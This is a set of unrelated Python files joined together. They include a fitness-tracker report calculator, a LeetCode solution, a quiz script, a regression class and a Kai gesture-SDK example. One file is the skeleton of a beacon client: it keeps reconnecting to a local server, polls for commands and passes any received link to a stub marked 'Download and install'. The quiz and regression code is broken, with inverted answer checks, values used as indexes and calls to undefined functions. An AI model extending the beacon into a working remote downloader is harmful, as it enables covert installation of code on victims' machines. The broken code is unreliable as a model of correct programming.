vo2max_days = (todays_meta_data.cum_vo2_max_days_count -
current_meta_data.cum_vo2_max_days_count)
val = _cal_vo2max_average(
todays_data.cum_vo2_max,
current_data.cum_vo2_max,
vo2max_days
)
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
return None
elif key == 'hr_aerobic_duration_hour_min':
if todays_meta_data and current_meta_data:
val = todays_data.cum_hr_aerobic_duration_hours\
- current_data.cum_hr_aerobic_duration_hours
return self._hours_to_hours_min(val)
return None
elif key == 'prcnt_aerobic_duration':
if todays_meta_data and current_meta_data:
# This stores workout duration per day from A/A chart 1
# For some reason we were storing weekly workout duration
# earlier but later we changed it. So please don't get
# confused with the name.
total_workout_duration = todays_data.cum_weekly_workout_duration_in_hours\
- current_data.cum_weekly_workout_duration_in_hours
total_aerobic_duration = todays_data.cum_hr_aerobic_duration_hours\
- current_data.cum_hr_aerobic_duration_hours
if total_workout_duration:
val = (total_aerobic_duration/total_workout_duration) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
return None
elif key == 'hr_anaerobic_duration_hour_min':
if todays_meta_data and current_meta_data:
val = todays_data.cum_hr_anaerobic_duration_hours\
- current_data.cum_hr_anaerobic_duration_hours
return self._hours_to_hours_min(val)
return None
elif key == 'prcnt_anaerobic_duration':
if todays_meta_data and current_meta_data:
total_workout_duration = todays_data.cum_weekly_workout_duration_in_hours\
- current_data.cum_weekly_workout_duration_in_hours
total_anaerobic_duration = todays_data.cum_hr_anaerobic_duration_hours\
- current_data.cum_hr_anaerobic_duration_hours
if total_workout_duration:
val = (total_anaerobic_duration/total_workout_duration) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
return None
elif key == 'hr_below_aerobic_duration_hour_min':
if todays_meta_data and current_meta_data:
val = todays_data.cum_hr_below_aerobic_duration_hours\
- current_data.cum_hr_below_aerobic_duration_hours
return self._hours_to_hours_min(val)
return None
elif key == 'prcnt_below_aerobic_duration':
if todays_meta_data and current_meta_data:
total_workout_duration = todays_data.cum_weekly_workout_duration_in_hours\
- current_data.cum_weekly_workout_duration_in_hours
total_below_aerobic_duration = todays_data.cum_hr_below_aerobic_duration_hours\
- current_data.cum_hr_below_aerobic_duration_hours
if total_workout_duration:
val = (total_below_aerobic_duration/total_workout_duration) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
return None
elif key == 'hr_not_recorded_duration_hour_min':
if todays_meta_data and current_meta_data:
val = todays_data.cum_hr_not_recorded_duration_hours\
- current_data.cum_hr_not_recorded_duration_hours
return self._hours_to_hours_min(val)
return None
elif key == 'prcnt_hr_not_recorded_duration':
if todays_meta_data and current_meta_data:
total_workout_duration = todays_data.cum_weekly_workout_duration_in_hours\
- current_data.cum_weekly_workout_duration_in_hours
total_hr_not_recorded_duration = todays_data.cum_hr_not_recorded_duration_hours\
- current_data.cum_hr_not_recorded_duration_hours
if total_workout_duration:
val = (total_hr_not_recorded_duration/total_workout_duration) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
return None
elif key in grades_bifurcation_keys:
if todays_meta_data and current_meta_data:
workout_days = (todays_meta_data.cum_workout_days_count -
current_meta_data.cum_workout_days_count)
return self._cal_grade_days_over_period(todays_data,current_data,
key,workout_days)
elif key in grades_prcnt_bifurcation_keys:
if todays_meta_data and current_meta_data:
workout_days = (todays_meta_data.cum_workout_days_count -
current_meta_data.cum_workout_days_count)
return self._cal_prcnt_grade_over_period(todays_data,current_data,
key, alias, workout_days)
return None
calculated_data = {
'workout_duration_hours_min':{d:None for d in self.duration_type},
'workout_effort_level':{d:None for d in self.duration_type},
'avg_exercise_heart_rate':{d:None for d in self.duration_type},
'avg_non_strength_exercise_heart_rate':{d:None for d in self.duration_type},
'total_non_strength_activities':{d:None for d in self.duration_type},
'total_strength_activities':{d:None for d in self.duration_type},
'vo2_max':{d:None for d in self.duration_type},
'total_workout_duration_over_range':{d:None for d in self.duration_type},
'hr_aerobic_duration_hour_min':{d:None for d in self.duration_type},
'prcnt_aerobic_duration':{d:None for d in self.duration_type},
'hr_anaerobic_duration_hour_min':{d:None for d in self.duration_type},
'prcnt_anaerobic_duration':{d:None for d in self.duration_type},
'hr_below_aerobic_duration_hour_min':{d:None for d in self.duration_type},
'prcnt_below_aerobic_duration':{d:None for d in self.duration_type},
'hr_not_recorded_duration_hour_min':{d:None for d in self.duration_type},
'prcnt_hr_not_recorded_duration':{d:None for d in self.duration_type}
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "exercise_stats_cum"
if custom_daterange:
alias = "custom_range"
summary_type = "exercise_stats_cum"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_alcohol_summary(self, custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_alcohol_week_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_alcohol_week_got')
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='avg_drink_per_day':
if todays_meta_data and current_meta_data:
alcohol_reported_days = (todays_meta_data.cum_reported_alcohol_days_count -
current_meta_data.cum_reported_alcohol_days_count)
if alcohol_reported_days:
val = self._get_average_for_duration(
todays_data.cum_alcohol_drink_consumed,
current_data.cum_alcohol_drink_consumed,alias)
return round(val,2)
else:
return 'Not Reported'
elif key =='avg_drink_per_week':
if todays_meta_data and current_meta_data:
alcohol_reported_days = (todays_meta_data.cum_reported_alcohol_days_count -
current_meta_data.cum_reported_alcohol_days_count)
if alcohol_reported_days:
val = self._get_average_for_duration(
todays_data.cum_average_drink_per_week,
current_data.cum_average_drink_per_week,alias)
return round(val,2)
else:
return 'Not Reported'
elif key == 'alcoholic_drinks_per_week_gpa':
val = self._get_average_for_duration(
todays_data.cum_alcohol_drink_per_week_gpa,
current_data.cum_alcohol_drink_per_week_gpa,alias)
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'alcoholic_drinks_per_week_grade':
return garmin_calculation.cal_alcohol_drink_grade(
self._get_average_for_duration(
todays_data.cum_average_drink_per_week,
current_data.cum_average_drink_per_week,alias
),self.user.profile.gender
)[0]
elif key == "prcnt_alcohol_consumption_reported":
if todays_meta_data and current_meta_data:
val = self._get_average_for_duration(
todays_meta_data.cum_reported_alcohol_days_count,
current_meta_data.cum_reported_alcohol_days_count,alias
) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key in grades_bifurcation_keys:
if todays_meta_data and current_meta_data:
alcohol_reported_days = (todays_meta_data.cum_reported_alcohol_days_count -
current_meta_data.cum_reported_alcohol_days_count)
return self._cal_grade_days_over_period(todays_data,current_data,
key, alcohol_reported_days)
elif key in grades_prcnt_bifurcation_keys:
if todays_meta_data and current_meta_data:
alcohol_reported_days = (todays_meta_data.cum_reported_alcohol_days_count -
current_meta_data.cum_reported_alcohol_days_count)
return self._cal_prcnt_grade_over_period(todays_data,current_data,
key, alias,alcohol_reported_days)
return None
calculated_data = {
'avg_drink_per_day':{d:None for d in self.duration_type},
'avg_drink_per_week':{d:None for d in self.duration_type},
'alcoholic_drinks_per_week_grade':{d:None for d in self.duration_type},
'alcoholic_drinks_per_week_gpa':{d:None for d in self.duration_type},
'prcnt_alcohol_consumption_reported':{d:None for d in self.duration_type}
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "alcohol_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_other_summary(self, custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_resting_hr_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_resting_hr_got')
def _cal_custom_average(stat1, stat2,days):
if not stat1 == None and not stat2 == None and days:
avg = (stat1 - stat2)/days
return avg
return 0
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='resting_hr':
if todays_meta_data and current_meta_data:
resting_hr_days = (todays_meta_data.cum_resting_hr_days_count -
current_meta_data.cum_resting_hr_days_count)
val = _cal_custom_average(
todays_data.cum_resting_hr,
current_data.cum_resting_hr,
resting_hr_days)
if val:
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
else:
return "Not Provided"
return None
elif key == 'hrr_time_to_99':
if todays_meta_data and current_meta_data:
hrr_time_to_99_days = (todays_meta_data.cum_hrr_to_99_days_count -
current_meta_data.cum_hrr_to_99_days_count)
val = self._min_to_min_sec(_cal_custom_average(
todays_data.cum_hrr_time_to_99_in_mins,
current_data.cum_hrr_time_to_99_in_mins,
hrr_time_to_99_days))
if hrr_time_to_99_days:
return val
else:
return "Not Provided"
return None
elif key == 'hrr_beats_lowered_in_first_min':
if todays_meta_data and current_meta_data:
beats_lowered_in_first_min_days = (
todays_meta_data.cum_hrr_beats_lowered_in_first_min_days_count -
current_meta_data.cum_hrr_beats_lowered_in_first_min_days_count
)
val = _cal_custom_average(
todays_data.cum_hrr_beats_lowered_in_first_min,
current_data.cum_hrr_beats_lowered_in_first_min,
beats_lowered_in_first_min_days)
if beats_lowered_in_first_min_days:
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
else:
return "Not Provided"
return None
elif key == 'hrr_highest_hr_in_first_min':
if todays_meta_data and current_meta_data:
highest_hr_in_first_min_days = (
todays_meta_data.cum_highest_hr_in_first_min_days_count -
current_meta_data.cum_highest_hr_in_first_min_days_count
)
val = _cal_custom_average(
todays_data.cum_highest_hr_in_first_min,
current_data.cum_highest_hr_in_first_min,
highest_hr_in_first_min_days)
if highest_hr_in_first_min_days:
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
else:
return "Not Provided"
return None
elif key == 'hrr_lowest_hr_point':
if todays_meta_data and current_meta_data:
hrr_lowest_hr_point_days = (
todays_meta_data.cum_hrr_lowest_hr_point_days_count -
current_meta_data.cum_hrr_lowest_hr_point_days_count
)
val = _cal_custom_average(
todays_data.cum_hrr_lowest_hr_point,
current_data.cum_hrr_lowest_hr_point,
hrr_lowest_hr_point_days)
if hrr_lowest_hr_point_days:
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
else:
return "Not Provided"
return None
elif key == 'hrr_pure_1_minute_beat_lowered':
if todays_meta_data and current_meta_data:
hrr_pure_1_minute_beat_lowered_days = (
todays_meta_data.cum_hrr_pure_1_minute_beat_lowered_days_count
- current_meta_data.cum_hrr_pure_1_minute_beat_lowered_days_count
)
val = _cal_custom_average(
todays_data.cum_hrr_pure_1_min_beats_lowered,
current_data.cum_hrr_pure_1_min_beats_lowered,
hrr_pure_1_minute_beat_lowered_days)
if hrr_pure_1_minute_beat_lowered_days:
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
else:
return "Not Provided"
return None
elif key == 'hrr_pure_time_to_99':
if todays_meta_data and current_meta_data:
hrr_pure_time_to_99_days = (
todays_meta_data.cum_hrr_pure_time_to_99_days_count
- current_meta_data.cum_hrr_pure_time_to_99_days_count
)
val = self._min_to_min_sec(_cal_custom_average(
todays_data.cum_hrr_pure_time_to_99,
current_data.cum_hrr_pure_time_to_99,
hrr_pure_time_to_99_days))
if hrr_pure_time_to_99_days:
return val
else:
return "Not Provided"
return None
elif key == 'hrr_activity_end_hr':
if todays_meta_data and current_meta_data:
hrr_activity_end_hr = (
todays_meta_data.cum_hrr_activity_end_hr_days_count
- current_meta_data.cum_hrr_activity_end_hr_days_count
)
val = _cal_custom_average(
todays_data.cum_hrr_activity_end_hr,
current_data.cum_hrr_activity_end_hr,
hrr_activity_end_hr)
if hrr_activity_end_hr:
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
else:
return "Not Provided"
return None
elif key == 'floors_climbed':
val = self._get_average_for_duration(
todays_data.cum_floors_climbed,
current_data.cum_floors_climbed,alias)
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'number_of_days_reported_inputs':
if todays_meta_data and current_meta_data:
days_reported_inputs = (
todays_meta_data.cum_inputs_reported_days_count
- current_meta_data.cum_inputs_reported_days_count
)
if days_reported_inputs:
return days_reported_inputs
else:
return "Not Reported"
elif key == 'prcnt_of_days_reported_inputs':
if todays_meta_data and current_meta_data:
val = self._get_average_for_duration(
todays_meta_data.cum_inputs_reported_days_count,
current_meta_data.cum_inputs_reported_days_count,alias
) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key in grades_bifurcation_keys:
if todays_meta_data and current_meta_data:
resting_hr_days = (todays_meta_data.cum_resting_hr_days_count -
current_meta_data.cum_resting_hr_days_count)
return self._cal_grade_days_over_period(todays_data,current_data,
key, resting_hr_days)
elif key in grades_prcnt_bifurcation_keys:
resting_hr_days = (todays_meta_data.cum_resting_hr_days_count -
current_meta_data.cum_resting_hr_days_count)
return self._cal_prcnt_grade_over_period(todays_data,current_data,
key, alias, resting_hr_days)
return None
calculated_data = {
'resting_hr':{d:None for d in self.duration_type},
'hrr_time_to_99':{d:None for d in self.duration_type},
'hrr_beats_lowered_in_first_min':{d:None for d in self.duration_type},
'hrr_highest_hr_in_first_min':{d:None for d in self.duration_type},
'hrr_lowest_hr_point':{d:None for d in self.duration_type},
'hrr_pure_1_minute_beat_lowered':{d:None for d in self.duration_type},
'hrr_pure_time_to_99':{d:None for d in self.duration_type},
'hrr_activity_end_hr':{d:None for d in self.duration_type},
'floors_climbed':{d:None for d in self.duration_type},
'number_of_days_reported_inputs': {d:None for d in self.duration_type},
'prcnt_of_days_reported_inputs': {d:None for d in self.duration_type}
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "other_stats_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_sick_summary(self,custom_daterange = False):
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='number_of_days_not_sick':
if todays_meta_data and current_meta_data:
days_sick_reported = (todays_meta_data.cum_reported_sick_days_count -
current_meta_data.cum_reported_sick_days_count)
days_sick = todays_data.cum_days_sick - current_data.cum_days_sick
val = days_sick_reported - days_sick
return val
elif key == 'prcnt_of_days_not_sick':
if todays_meta_data and current_meta_data:
days_sick_not_sick_reported = (todays_meta_data.cum_reported_sick_days_count -
current_meta_data.cum_reported_sick_days_count)
days_sick = todays_data.cum_days_sick - current_data.cum_days_sick
days_not_sick = days_sick_not_sick_reported - days_sick
if days_sick_not_sick_reported:
val = (days_not_sick/days_sick_not_sick_reported) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'number_of_days_sick':
val = todays_data.cum_days_sick - current_data.cum_days_sick
return val
elif key == 'prcnt_of_days_sick':
if todays_meta_data and current_meta_data:
days_sick_not_sick_reported = (todays_meta_data.cum_reported_sick_days_count -
current_meta_data.cum_reported_sick_days_count)
days_sick = todays_data.cum_days_sick - current_data.cum_days_sick
if days_sick_not_sick_reported:
val = (days_sick/days_sick_not_sick_reported) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'days_sick_not_sick_reported':
if todays_meta_data and current_meta_data:
days_sick_not_sick_reported = (todays_meta_data.cum_reported_sick_days_count -
current_meta_data.cum_reported_sick_days_count)
return days_sick_not_sick_reported
return None
calculated_data = {
'number_of_days_not_sick':{d:None for d in self.duration_type},
'prcnt_of_days_not_sick':{d:None for d in self.duration_type},
'number_of_days_sick':{d:None for d in self.duration_type},
'prcnt_of_days_sick':{d:None for d in self.duration_type},
'days_sick_not_sick_reported':{d:None for d in self.duration_type}
}
summary_type = "sick_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias, summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_stress_summary(self,custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_garmin_stress_days_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('garmin_stress_days_got')
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='number_of_days_low_stress_reported':
days_low_stress = (
todays_data.cum_days_low_stress -
current_data.cum_days_low_stress
)
return days_low_stress
elif key == "prcnt_of_days_low_stress":
if todays_meta_data and current_meta_data:
days_stress_reported = (
todays_meta_data.cum_reported_stress_days_count -
current_meta_data.cum_reported_stress_days_count
)
days_low_stress = (
todays_data.cum_days_low_stress -
current_data.cum_days_low_stress
)
if days_stress_reported:
val = (days_low_stress/days_stress_reported)*100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == "number_of_days_medium_stress_reported":
days_medium_stress = (
todays_data.cum_days_medium_stress -
current_data.cum_days_medium_stress
)
return days_medium_stress
elif key == "prcnt_of_days_medium_stress":
if todays_meta_data and current_meta_data:
days_stress_reported = (
todays_meta_data.cum_reported_stress_days_count -
current_meta_data.cum_reported_stress_days_count
)
days_medium_stress = (
todays_data.cum_days_medium_stress -
current_data.cum_days_medium_stress
)
if days_stress_reported:
val = (days_medium_stress/days_stress_reported)*100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == "number_of_days_high_stress_reported":
days_high_stress = (
todays_data.cum_days_high_stress -
current_data.cum_days_high_stress
)
return days_high_stress
elif key == "prcnt_of_days_high_stress":
if todays_meta_data and current_meta_data:
days_stress_reported = (
todays_meta_data.cum_reported_stress_days_count -
current_meta_data.cum_reported_stress_days_count
)
days_high_stress = (
todays_data.cum_days_high_stress -
current_data.cum_days_high_stress
)
if days_stress_reported:
val = (days_high_stress/days_stress_reported)*100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == "days_stress_level_reported":
days_stress_reported = (
todays_meta_data.cum_reported_stress_days_count -
current_meta_data.cum_reported_stress_days_count
)
return days_stress_reported
elif key == "garmin_stress_lvl":
avg_stress_level = self._get_average_for_duration(
todays_data.cum_days_garmin_stress_lvl,
current_data.cum_days_garmin_stress_lvl,alias)
return round(avg_stress_level,2)
elif key == "number_of_days_high_medium_stress":
days_medium_stress = (
todays_data.cum_days_medium_stress -
current_data.cum_days_medium_stress
)
days_high_stress = (
todays_data.cum_days_high_stress -
current_data.cum_days_high_stress
)
return days_medium_stress+days_high_stress
elif key == "prcnt_of_days_high_medium_stress":
if todays_meta_data and current_meta_data:
days_stress_reported = (
todays_meta_data.cum_reported_stress_days_count -
current_meta_data.cum_reported_stress_days_count
)
days_medium_stress = (
todays_data.cum_days_medium_stress -
current_data.cum_days_medium_stress
)
days_high_stress = (
todays_data.cum_days_high_stress -
current_data.cum_days_high_stress
)
total_medium_high_stress_days = days_medium_stress + days_high_stress
if days_stress_reported:
val = (total_medium_high_stress_days/days_stress_reported)*100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key in grades_bifurcation_keys:
if todays_meta_data and current_meta_data:
reported_days = todays_meta_data.cum_have_garmin_stress_days_count\
- current_meta_data.cum_have_garmin_stress_days_count
return self._cal_grade_days_over_period(todays_data, current_data,
key, reported_days)
elif key in grades_prcnt_bifurcation_keys:
if todays_meta_data and current_meta_data:
reported_days = todays_meta_data.cum_have_garmin_stress_days_count\
- current_meta_data.cum_have_garmin_stress_days_count
return self._cal_prcnt_grade_over_period(todays_data, current_data,
key, alias, reported_days)
return None
calculated_data = {
'number_of_days_low_stress_reported':{d:None for d in self.duration_type},
'prcnt_of_days_low_stress':{d:None for d in self.duration_type},
'number_of_days_medium_stress_reported':{d:None for d in self.duration_type},
'prcnt_of_days_medium_stress':{d:None for d in self.duration_type},
'number_of_days_high_stress_reported':{d:None for d in self.duration_type},
'prcnt_of_days_high_stress':{d:None for d in self.duration_type},
'days_stress_level_reported':{d:None for d in self.duration_type},
'garmin_stress_lvl':{d:None for d in self.duration_type},
'number_of_days_high_medium_stress':{d:None for d in self.duration_type},
'prcnt_of_days_high_medium_stress':{d:None for d in self.duration_type}
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "stress_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias, summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_travel_summary(self, custom_daterange = False):
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='number_days_travel_away_from_home':
val = (todays_data.cum_days_travel_away_from_home -
current_data.cum_days_travel_away_from_home)
return val
elif key == "prcnt_days_travel_away_from_home":
val = self._get_average_for_duration(
todays_data.cum_days_travel_away_from_home,
current_data.cum_days_travel_away_from_home,alias
) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
return None
calculated_data = {
'number_days_travel_away_from_home':{d:None for d in self.duration_type},
'prcnt_days_travel_away_from_home':{d:None for d in self.duration_type}
}
summary_type = "travel_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_standing_summary(self, custom_daterange = False):
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='number_days_stood_three_hours':
val = (todays_data.cum_days_stand_three_hour -
current_data.cum_days_stand_three_hour)
return val
elif key == "prcnt_days_stood_three_hours":
if todays_meta_data and current_meta_data:
days_reported_stood_not_stood_three_hours = (
todays_meta_data.cum_reported_stand_three_hours_days_count -
current_meta_data.cum_reported_stand_three_hours_days_count
)
val = (todays_data.cum_days_stand_three_hour -
current_data.cum_days_stand_three_hour)
if days_reported_stood_not_stood_three_hours:
val = (val/days_reported_stood_not_stood_three_hours) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
else:
return 0
elif key == "number_days_reported_stood_not_stood_three_hours":
days_reported_stood_not_stood_three_hours = (
todays_meta_data.cum_reported_stand_three_hours_days_count -
current_meta_data.cum_reported_stand_three_hours_days_count
)
return days_reported_stood_not_stood_three_hours
return None
calculated_data = {
'number_days_stood_three_hours':{d:None for d in self.duration_type},
'prcnt_days_stood_three_hours':{d:None for d in self.duration_type},
'number_days_reported_stood_not_stood_three_hours':{d:None for d in self.duration_type}
}
summary_type = "standing_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def get_progress_report(self):
# Driver method to generate and return PA reports
SUMMARY_CALCULATOR_BINDING = self._get_summary_calculator_binding()
DATA = {'summary':{}, "report_date":None}
for summary in self.summary_type:
DATA['summary'][summary] = SUMMARY_CALCULATOR_BINDING[summary](self.custom_daterange)
if self.current_date:
duration = self._get_duration_datetime(self.current_date)
duration_dt = {}
for dur in self.duration_type:
if dur == 'today' or dur == 'yesterday':
duration_dt[dur] = duration[dur].strftime("%Y-%m-%d")
else:
dt_str = (duration[dur] + timedelta(days=1)).strftime("%Y-%m-%d") +\
" to " + duration['yesterday'].strftime("%Y-%m-%d")
duration_dt[dur] = dt_str
DATA['duration_date'] = duration_dt
DATA['report_date'] = self.current_date.strftime("%Y-%m-%d")
return DATA
|
# -*- coding: utf-8 -*-
from collections import Counter
class Solution:
def maxNumberOfBalloons(self, text):
counts = Counter(text)
return min(
counts["b"], counts["a"], counts["l"] // 2, counts["o"] // 2, counts["n"]
)
if __name__ == "__main__":
solution = Solution()
assert 1 == solution.maxNumberOfBalloons("nlaebolko")
assert 2 == solution.maxNumberOfBalloons("loonbalxballpoon")
assert 0 == solution.maxNumberOfBalloons("leetcode")
|
import socket
import time
import urllib.request
obj = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
time_per_signal = 5
addr = ("127.0.0.1",5883)
class handlers:
def nothing():
return "nothing"
def activate(link):
#Download and install
return "nothing"
def connect_to(obj,addr):
while True:
try:
obj.connect(addr)
break
except:
time.sleep(3)
continue
check_loop(obj,addr)
def check_loop(obj,addr):
while True:
try:
obj.send(b"update")
data = obj.recv(4096).decode()
if data == "nothing":
done = handlers.nothing()
elif "link: " in data:
link = data[6:]
handlers.activate(link)
else:
continue
time.sleep(time_per_signal)
except Exception as e:
if "Broken pipe" in e:
break
connect_to(obj,addr)
connect_to(obj,addr)
|
def function(question_list):
ans_list=[2,1,4]
i=0
while i<len(question_list):
print(question_list[i])
j=0
while j<len(option_list[i]):
print(option_list[i][j])
j=j+1
def function2(ans):
if ans!=ans_list[i]:
print("correct",ans)
else:
print("wrong",ans)
function2(ans_list)
i=i+1
question_list=["how many continent are there?","what is the capital of india?","ng me kaun se course se padha jaata hai?"]
option_list=[["four","nine","seven","eight"],["chandigarh","bhopal","chennai","delhi"],["software engineering","counseling tourism","agriculture"]]
function(question_list)
function(option_list)
|
import os
import sys
import io
import urllib.request as req
import requests,json
import urllib.parse as rep
from bs4 import BeautifulSoup
sys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')
sys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')
input_x = [1,2,3,4,5,6,7,8,9,10]
inpuy_y = [10,11,12,13,14,15,16,17,18,19]
class regression:
def __init__(self,x=[],y=[]):
self.x=x
self.y=y
self.meanx=0
self.meany=0
def mean_x(self):
meanx = 0
sum =0
for i in self.x:
sum +=i
meanx = sum /len(self.x)
return meanx
def mean_y(self):
meany = 0
sum =0
for i in self.y:
sum +=i
meany = sum /len(self.y)
return meany
def gradient_b1(self):
mean_x1 = self.meanx
#mean_x()
#new_meanx = mean_x1.meanx
mean_y1 = self.meany
#mean_y()
#new_meany = mean_y1.meany
b1=[]
b2=[]
new_sum =0
new_sum2=0
result=0
for i in self.x:
b1.append((( mean_x1 - self.x[i] ) *( mean_y1 - self.y[i] )))
new_sum2 += ((self.x[i] - mean_x1)**2)
for j in b1:
new_sum +=j
result = new_sum / new_sum2
return result
def gradient_b0(self):
b0=0
bb = gradient_b1()
f_b1 = bb.result
new_meanx2 = mean_x()
f_meanx = new_meanx2.meanx
new_meany2 = mean_y()
f_meany = new_meanx2.meany
b0 = f_meany - (f_b1 * f_mean)
return b0
test = regression([1,2,3,4,5,6,7,8,9,10],[10,11,12,13,14,15,16,17,18,19])
print(test.x)
print(test.y)
print(test.mean_x())
print(test.gradient_b1())
|
"""
Example program for receiving gesture events and accelerometer readings from Kai
"""
import os
import time
import configparser
from KaiSDK.WebSocketModule import WebSocketModule
from KaiSDK.DataTypes import KaiCapabilities
import KaiSDK.Events as Events
from pythonosc.dispatcher import Dispatcher
from pythonosc.udp_client import SimpleUDPClient
dispatcher = Dispatcher()
client = SimpleUDPClient("127.0.0.1", 1337)
def gestureEvent(ev):
gestureString = ev.gesture
if (str(gestureString) == "Gesture.swipeUp"):
client.send_message("/gesture", 1)
elif (str(gestureString) == "Gesture.swipeDown"):
client.send_message("/gesture", 2)
elif (str(gestureString) == "Gesture.swipeLeft"):
client.send_message("/gesture", 3)
elif (str(gestureString) == "Gesture.swipeRight"):
client.send_message("/gesture", 4)
def pyrEv(ev):
client.send_message("/pitch", ev.pitch)
client.send_message("/yaw", ev.yaw)
client.send_message("/roll", ev.roll)
def quatEv(ev):
client.send_message("/quatW", ev.quaternion.w)
client.send_message("/quatX", ev.quaternion.x)
client.send_message("/quatY", ev.quaternion.y)
client.send_message("/quatZ", ev.quaternion.z)
def fingersEv(ev):
client.send_message("/littleFinger", ev.littleFinger)
client.send_message("/ringFinger", ev.ringFinger)
client.send_message("/middleFinger", ev.middleFinger)
client.send_message("/indexFinger", ev.indexFinger)
# Use your module's ID and secret here
config = configparser.ConfigParser()
config.read("config.ini")
moduleID = "12345"
moduleSecret = "qwerty"
# Create a WS module and connect to the SDK
module = WebSocketModule()
success = module.connect(moduleID, moduleSecret)
if not success:
print("Unable to authenticate with Kai SDK")
exit(1)
# Set the default Kai to record gestures and accelerometer readings
module.setCapabilities(module.DefaultKai, KaiCapabilities.GestureData | KaiCapabilities.PYRData | KaiCapabilities.QuaternionData | KaiCapabilities.FingerShortcutData)
# Register event listeners
module.DefaultKai.register_event_listener(Events.GestureEvent, gestureEvent)
module.DefaultKai.register_event_listener(Events.PYREvent, pyrEv)
module.DefaultKai.register_event_listener(Events.QuaternionEvent, quatEv)
module.DefaultKai.register_event_listener(Events.FingerShortcutEvent, fingersEv)
# module.DefaultKai.register_event_listener(Events.AccelerometerEvent, accelerometerEv)
# module.DefaultKai.register_event_listener(Events.GyroscopeEvent, gyroscopeEv)
# module.DefaultKai.register_event_listener(Events.MagnetometerEvent, magnetEv)
#time.sleep(30) # Delay for testing purposes
# Save Kai battery by unsetting capabilities which are not required anymore
# module.unsetCapabilities(module.DefaultKai, KaiCapabilities.AccelerometerData)
#time.sleep(30)
#module.close()
# ws://localhost:2203
